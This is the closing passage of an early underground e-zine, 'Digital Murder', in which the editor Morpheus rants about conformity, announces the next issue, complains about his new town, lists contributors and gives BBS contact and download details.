- through a sieve, draining out all their unique qualities till
- all that's left is another person totally conditioned to be a
- corporate slave. Think about this. Think about and question
- everything.
-
- Thanks for reading and supporting Digital Murder. Issue #3
- will be out December 15th. FEEL FREE to help out! Don't let
- those fascist shits on Capital Hill fool you into thinking
- that you can't still voice your opinion or share information!
- Call The Backdoor, leave me, Morpheus, feedback. Send in an
- article or just drop in and say what's on your mind.
-
- The 'zine should be better now that it'z getting more support
- as well as the fact that I've moved to the most boring city
- in the whole phucking world. The most ''exciting'' thing to
- do around here is this building that is the home of a movie
- theater that shows old movies, a skating rink and bowling
- alley for pre-teen preppies, and an arcade featuring billybob
- and his cousins playing pool for car titles while I waste my
- money on one of the seven video games in the city's only
- arcade. At least the old city I lived in isn't too far away
- from here. So while you are walking around breathing in
- America's cold, toxic, city air or feasting on the carcass of
- a dead turkey for thanksgiving, think of your editor slaving
- over the keys to bring forth another edition of the one and
- only Digital Murder.
-
- Contributors: Morpheus, Technysis, Chizz, Zapped, NeuronGod,
- Mystic Blade, and Digital Terrorist.
-
- Support Boards: Backdoor (901)/386.6455
-
- Wanna be a support board? Leave Morpheus feedback on Backdoor.
-
-
- \n
-
- UD#9: Digital Murder U/D
- [X-Modem/UnltdBlk] UD:
- Downloaded From P-80 International Information Systems 304-744-2253
-